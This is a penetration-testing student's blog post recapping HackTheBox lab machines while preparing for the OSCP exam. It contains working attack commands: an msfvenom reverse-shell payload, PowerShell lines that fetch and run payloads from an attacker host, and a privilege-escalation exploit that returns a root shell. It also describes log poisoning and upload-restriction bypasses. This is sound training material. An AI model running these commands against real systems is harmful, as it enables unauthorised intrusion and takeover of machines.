OSCP Week 14: HackTheBox (Part 2)

In the same vein as last week, I went through some more HackTheBox machines this week in preparation for my OSCP exam. Below are my quick thoughts and key takeaways for each of the machines I attempted.

Arctic

Similar to a machine seen in the OSCP, Arctic is a relatively straightforward web application exploit. Making use of a vulnerable version of Adobe ColdFusion to gain access and upload a file for a reverse shell is nothing too new, but IppSec also demonstrated the use of powershell commands to transfer files and obtain code execution which added a new element to an otherwise straightforward machine.

Key Takeaways:

Setting up Metasploit with the basic options could fail despite the settings being seemingly accurate. One way to troubleshoot why this could be is to set the verbose option to true. This can be done using show advanced options –> set VERBOSE true. Another way is to use the Proxies option in Metasploit or use Burp Suite to capture the traffic for further analysis. A proxy can be setup in Burp Suite using the following: Proxy –> Options –> Proxy Listeners Add –> Choose Bind Port –> Request Handling –> Choose host and port to redirect to.

Unicorn – generate a meterpreter reverse shell for use within metasploit
msfconsole -r unicorn.rc
Msfvenom can also be used to generate a .exe that can be uploaded and executed
msfvenom -p windows/meterpreter/reverse_tcp lhost=x.x.x.x lport=xxxx -f exe -o arctic.exe

This file can be uploaded using the powershell command to upload:
powershell “(new-object System.Net.WebClient).Downloadfile(‘http://x.x.x.x:80/arctic.exe’, ‘arctic.exe’)’
Or
powershell “(new-object Net.WebClient).DownloadString(‘http://10.10.14.14:80/exploit.html’)”

To escalate privileges, I used a command similar to the above to download the Chimichurri.exe file which is a compiled version of the MS09-012 exploit and executed it for a root shell.
powershell “(new-object System.Net.WebClient).Downloadfile(‘http://x.x.x.x:80/Chimichurri.exe’, ‘Chimichurri.exe’)”
Chimichurri.exe 10.10.14.14 443
This sends a reverse shell to Port 443 with root privileges

Optimum

This one was surprisingly difficult to complete despite using Metasploit for both stages of the exploitation. There was a lot of maneuvering that had to be done around the architecture types of the machine and the subsequent meterpreter sessions, which goes to show how unstable some of these exploits can be.

Key Takeaways:

For some reason, using the windows/meterpreter/reverse_tcp to spawn a x86 bit shell and migrating it to a x64 bit process to create a x64 bit meterpreter session means the local privilege exploit module doesn’t work.

If you use the windows/x64/meterpreter/reverse_tcp payload to begin with and spawn a x64 bit meterpreter session initially, the privilege escalation exploit will work. Weird.

Jerry

Relatively straightforward with nothing too exciting other than a reminder to not use default credentials. I did pick up some nuances around how .war and .jsp files are executed on Tomcat servers, but otherwise not too much to gain from this one.

Key Takeaways:

A .war file can be extracted using jar -xvf shell.war to find the .jsp file that was created as xxx.jsp. Browsing to http://10.10.10.95:8080/shell/xxx.jsp with a netcat listener running returns a reverse shell.

Interestingly, the above was only necessary when the payload was windows/x64/meterpreter/reverse_tcp. Using a java payload java/jsp_shell_reverse_tcp executed instantly when the shell.war file was browsed to.

Poison

A rather involved machine, Poison required Local File Inclusion for a low privilege shell and SSH port forwarding to access the service required for privilege escalation. I learned a lot from Posion and I’d rate it as one of my favorite machines so far.

Key Takeaways:

There was some more IppSec wizardry in the video walkthrough for this box, as he displayed how to make use of phpinfo allowing files to generate a reverse shell. He also went through log poisoning where the user agent can be modified to execute commands and gain a reverse shell.

secure copy (scp) – this is a command to copy files between hosts on a network.
scp charix@10.10.10.84:secret.zip

SSH tunneling – this was briefly covered in the PwK course material but not something I was overly familiar with. The VNC server running on this machine was only accessible locally, so ssh tunneling through the charix user was required to access it via our local host machine.
ssh -L 5901:127.0.0.1:5901 charix@10.10.10.84

VNC – Again, this is something I have seen but am not overly familiar with. VNC is a graphical remote desktop system similar to the RDP protocol. It can be accessed on this machine using:
vncviewer localhost:5901 -passwd secret
The -passwd flag specifies a password file to be used for authentication instead of a traditional password. This was noticed when the secret password file returned illegible characters, indicating it was likely encrypted it’s required use as a password file.

Grandpa

One of the easiest machines, Grandpa can be completed using metasploit pre and post exploitation modules. An interesting little twist was that this machine required you to migrate the process before being able to escalate to root, which taught me a lot about processes and which are more likely to be useful for post exploitation modules.

Key Takeaways:

davtest – does some basic webdav tests to display what commands can be run on the wedav machine.

Overcome PUT restrictions with the move command. By putting the .html file to the server first and then moving it back to a .aspx file upload restrictions can be bypassed. I always enjoy learning about new ways to overcome upload restrictions and this was another interesting one.

Migrate a meterpreter session to a more stable process. My privesc exploit didn’t work until I did this!
1. List all processes using the meterpreter command ps
2. Note the PID of a process that is stable. One way to do identify this is by noting the user. Because the process I was initially running wasn’t as a valid user on the box, I didn’t have the requried access to use the privesc exploit until migrating to one that did.
3. In meterpreter, run the command migrate <old PID> <new PID>

Brainfuck

This machine was rated as one of the harder machines on the HackTheBox network and it showed. I watched IppSec’s video on this but found myself struggling to follow along with what he was doing and why he was doing it. Unfortunately I was unable to gain much from this machine other than a few tips here and there.

Key Takeaways:

enumerating a webservice by looking at the certificate information.
page info –> view certificate –> details
Ipp was able to find an email address in the ‘field value’
alternative DNS names –> add these to the host and view the pages

wpscan –enumerate u can be used to enumerate user accounts that exist on a WordPress site.

My OSCP exam is on Friday and I’ve been a little stressed out and nervous. With that in mind, I’ve decided to take this weekend off to relax and spend the last few days leading up to the exam reading through course material. In particular, I want to make sure I’ve nailed down the Buffer Overflow sections and potentially do some practice runs to ensure I’m comfortable with building these exploits. Ideally, I plan to attempt the Buffer Overflow machine in the exam first and have it knocked out within an hour or two.

Expect my next post to be an exam breakdown, I plan to write one whether I pass or fail so hopefully it will be useful either way.

Kento.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s